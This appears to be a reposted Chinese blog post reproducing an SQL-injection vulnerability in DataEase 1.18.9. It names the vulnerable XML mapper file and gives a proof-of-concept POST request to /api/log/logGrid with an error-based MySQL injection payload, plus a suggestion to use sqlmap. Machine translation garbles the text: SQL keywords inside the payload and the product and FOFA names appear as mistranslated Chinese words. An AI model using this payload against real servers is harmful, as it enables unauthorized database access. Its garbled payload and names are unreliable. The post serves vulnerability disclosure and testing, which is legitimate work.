【漏洞复现】DataEase数据可视化分析工具SQL注入

【漏洞复现】DataEase数据可视化分析工具SQL注入1、DataEase数据可视化分析工具简介 DataEase 是开源的数据可视化分析工具,帮助用户快速分析数据并洞察业务趋势,从而实现业务的改进与优化。Da

1、DataEase数据可视化分析工具简介

DataEase是一款开源的数据可视化分析工具,可以让用户快速分析数据并洞察业务趋势,从而实现业务改进和优化。 DataEase支持丰富的数据源连接,让您可以通过拖放快速创建图表,并轻松与他人共享。

前端:Vue.js、Element

画廊:Apache ECharts、AntV

后端:Spring Boot

中间件:MySQL

数据处理:Kettle、Apache Doris

基础设施:Docker

照片

2、漏洞描述

DataEase存在SQL注入漏洞,不受SQL注入黑名单影响。

3、受影响版本

数据易 v.1.18.9

4、FOFA语句

《数据轻松》

5、漏洞复现

使用${} 表示法的SQL 语句位于以下文件位置: https://github.com/dataease/dataease/blob/dev/backend/src/main/java/io/dataease/ext/query/GridSql.xml

照片

POC

POST /api/log/logGrid/1/10 HTTP/1.1

{\’orders\’:[\’time desc\’],\’conditions\’:[{\’field\’:\’123 AND GTID_SUBSET(CONCAT(0x716a6a6b71,(SELECT version()),0x716a6a6a71),1215)) RLIKE (SELECT (CASE WHEN) )(8626=8626)然后0x31323320414e4420475449445f53554253455428434f4e434154283078373136613661366237312c2853454c45435420766572736 6f6e2829292c307837313661366136613731292c3132313529否则0x28结束))和(7803=7803\’}]}

需要管理员/数据管理员登录

点击操作日志抓包

使用SQLMAP

#【漏洞复现】以上DataEase数据可视化分析工具SQL注入源网相关内容仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92602.html

Like (0)
CSDN的头像CSDN
Previous 2024年6月27日
Next 2024年6月27日

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注